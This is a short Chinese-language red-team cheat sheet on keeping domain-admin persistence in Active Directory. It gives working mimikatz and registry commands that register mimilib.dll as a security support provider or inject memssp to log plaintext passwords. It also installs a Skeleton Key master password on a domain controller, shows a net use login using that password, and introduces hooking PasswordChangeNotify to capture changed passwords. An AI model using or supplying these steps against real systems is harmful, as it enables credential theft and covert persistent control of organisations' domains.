域管權限維持

1、ssp密碼記錄

ssp（security Support Provider）,一個用於身份驗證的 dll,系統在啓動時 SSP 會被加載到 lsass.exe 進程中,因爲 lsa 可擴展,致使在系統啓動時咱們能夠加載一個自定義的 dll,一個用於記錄全部登陸到當 前系統的明文帳號密碼的 dll, 利用mimikatz 中mimilib.dll 文件。

把 mimikatz 中的 mimilib.dll 傳到目標域控的 c:\windows\system32\目錄下

copy mimilib.dll %systemroot%\system32

reg query hklm\system\currentcontrolset\control\lsa\ /v "Security Packages" 

reg add "hklm\system\currentcontrolset\control\lsa\" /v "Security Packages" /d "kerberos\0msv1_0\0schannel\0wdigest\0tspkg\0pku2u\0mimilib" /t REG_MULTI_SZ 

  重啓成功，若是有用戶成功登陸到當前系統中,會在 c:\windows\system32 目錄下生成一個用於記錄登帳帳號密碼的 kiwissp.log 文件

 

（2）利用方式二 ,利用進程注入，無需重啓當即開啓密碼記錄，重啓則計算機失效

mimikatz privilege::debug

mimikatz misc::memssp

type C:\Windows\System32\mimilsa.log 

2、Skeleton Key

Skeleton Key被安裝在64位的域控服務器上,支持Windows Server2003—Windows Server2012 R2,可以讓全部域用戶使用同一個萬能密碼進行登陸，現有的全部域用戶使用原密碼仍能繼續登陸，注意並不能更改用戶權限，重啓後失效。

mimikaz執行命令：privilege::debug、misc::skeleton

mimikatz的默認Skeleton Key設置爲mimikatz（坑點：使用主機名連接）

net use \\WIN-6HQC11EJBDP.yiwang.com\c$ /user:"yiwang\administrator" "mimikatz"

 二.Hook PasswordChangeNotify

Hook PasswordChangeNotify 攔截修改的賬戶密碼,當修改域控密碼時,LSA 首先會去調用 PasswordFileter 來判斷新密碼是否符合密碼複雜度要求,若是符合,LSA 則會接着去調用 PasswordChangeNotify 在系統上同步更新密碼,而函數 PasswordChangeNotify 存在於 rassfm.dll，rassfm.dll可理解爲Remote Access Subauthentication dll，只存在於在Server系統下，xp、win七、win8等均不存在。